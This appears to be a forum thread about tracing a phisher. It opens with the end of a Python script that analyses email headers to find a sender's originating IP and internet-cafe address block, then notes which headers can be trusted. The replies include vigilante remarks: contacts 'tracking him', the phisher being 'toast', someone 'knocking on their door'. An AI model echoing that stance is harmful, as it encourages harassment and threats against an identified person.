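def from_same_block(ips, inetnum):
    """Subset of ips that fall inside the inetnum: 'same cafe' across several messages."""
    return [ip for ip in ips if in_inetnum(ip, inetnum)]


if __name__ == "__main__":
    msg = parse_message(RAW_HEADERS)
    for i, hop in enumerate(hops(msg), 1):
        print(i, hop["ip"], hop["from"], "->", hop["by"], hop["via"] or "")
    ip, hop = originating_ip(msg)
    print("originating:", ip, "via", hop["via"], "stamped by", hop["by"])
    print("spf:", spf_result(msg))
    print("cafe block:", inetnum_to_networks(CAFE_INETNUM))
    print("same block:", from_same_block(OBSERVED_IPS, CAFE_INETNUM))
```

The first-public-IP rule is right for webmail, where the client cannot inject headers, but for a message submitted over SMTP the sender controls every Received line below the first trusted relay; in that case start the walk from the hop stamped by the server whose SPF or DomainKeys result you can see and treat anything earlier as untrusted.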
Edit+added link

JakartaStinks
@comcast.net | reply to MGD: MGD, that's hilarious! Good post; most of those phishers are just wanna-be's trying to make a buck the wrong way. Sooner or later it always catches up, whether it's police or someone knocking on their door ..... that post is hilarious!

spanishbob
join:2004-11-30 spain | reply to MGD: Enjoying this one, will follow. Would be nice to see this little $hitbag caught. Does the FBI coordinate with local police to catch these guys? Even Kiwis have better spelling than that!

catseyenu (Ack Pfft) Premium join:2001-11-17 Fix East
I've got some Indonesian contacts tracking him now. He'd better not have any "nervous" associates or he's toast.

waldoooo
join:2001-12-15 Fountain Valley, CA
edit: February 4th, @02:08PM
reply to MGD, quoting: reply to Anon Re: [Phishing] Bank of America Phish, caught work
I guess someone must have sent you a "HEADS UP"
I doubt anyone tipped him off; google his name again and guess what's at the top of the list.